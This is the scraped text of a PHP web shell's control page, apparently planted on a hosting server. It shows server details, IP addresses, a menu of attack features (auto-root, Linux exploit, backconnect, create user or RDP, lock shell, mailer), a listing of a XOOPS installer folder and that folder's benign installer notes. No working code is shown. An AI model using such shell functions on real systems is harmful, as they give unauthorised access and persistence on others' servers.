Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
xoops /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
changelog.txt
51.15
KB
-rw-r--r--
clone.php
3.27
KB
-rw-r--r--
edit.php
4.37
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
452
B
-rw-r--r--
import.php
3.62
KB
-rw-r--r--
info.xml
2.9
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.65
KB
-rw-r--r--
install.xml
1.43
KB
-rw-r--r--
mainfile.php
3.43
KB
-rw-r--r--
md5
1.14
KB
-rw-r--r--
notes.txt
1.18
KB
-rw-r--r--
secure.php
1.66
KB
-rw-r--r--
upgrade.php
5.09
KB
-rw-r--r--
upgrade.xml
429
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1) Put Upgrade folder in the ZIP Package 2) xoops_data and xoops_lib go in data.zip 3) In Upgrade.php we have written code for version 2.5.0 (for not to show the upgrade link) 4) We have added fix in Upgrade/upd-2.4.0-to-2.4.1 index.php. Replaced $checkbit with $func. check if upgrade works without this fix in next version (4th step is not required from version 2.5.7. It works fine from 2.5.7) 5) XOOPS checks for illegal characters in path (which does not allow space) causing upgrade to fail hence we have added the same preg_match pattern in upgrade.php __requirements() function. Check if they update this pattern to allow spaces in future. Taken from : class/libraries/vendor/xoops/xmf/src/Xmf/Language.php 6) We do not configure include/license.php 7) PHP REQUIREMENT LINK : https://xoops.gitbook.io/xoops-install-upgrade/installation/requirements 8) Check and Copy '{{SOFTDATADIR}}/xoops_data/configs' folder from manual to zip as these files are not created. They can be checked from respective classes in {{DOCROOT}}/class/{{CONFIG_FILE_NAME}}.dist.php and also '{{SOFTDATADIR}}/xoops_data/configs/xoopsconfig.php' can be checked from '{{SOFTDATADIR}}/xoops_data/configs/xoopsconfig.dist.php'
Close